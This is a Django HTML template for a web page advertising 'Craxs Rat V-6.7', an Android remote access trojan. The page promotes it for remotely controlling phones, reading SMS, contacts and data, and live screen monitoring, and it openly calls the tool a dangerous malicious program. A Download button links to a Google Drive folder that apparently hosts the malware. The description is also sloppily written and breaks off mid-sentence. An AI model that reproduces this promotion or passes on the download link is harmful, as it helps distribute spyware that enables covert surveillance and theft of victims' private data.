{% extends 'app/base.html' %}
{% load static %}
{% block title %}Craxs Rat{% endblock title %}
{% block main-content %}
<div class="px-4 py-5 my-5 text-center">
    <img class="d-block mx-auto mb-4" src="{% static 'app/images/product/craxs.jpeg' %}" alt="" width="300px" height="300px">
    <h1 class="display-5 fw-bold text-body-emphasis">Craxs Rat V-6.7</h1>
    <div class="col-lg-6 mx-auto">
      <p class="lead mb-4">CraxsRat is a android Hacking software program that gives you the ability to control & manage your android device remotely from windows pc , such as read/backup/manage/etc , data,sms,contacts,applications,etc. In This RAT you get to see many methods and techniques of Android Hacking. and also in this Tool you will know learn how Android Hacking Works 

        Craxrat Live screen monatring malicious program that remotely accesses infected resources. Trojans of this type are among the most dangerous because they open up all kinds</p>
      <div class="d-grid gap-2 d-sm-flex justify-content-sm-center">
        <a href="https://drive.google.com/drive/u/0/folders/1cfV8Za4p0BRA40_jhwrrpxMndwVMRm7r">
          <button type="button" class="btn btn-primary btn-lg px-4 me-md-2 fw-bold">Download</button>
        </a>
      </div>
    </div>
  </div>
{% endblock main-content %}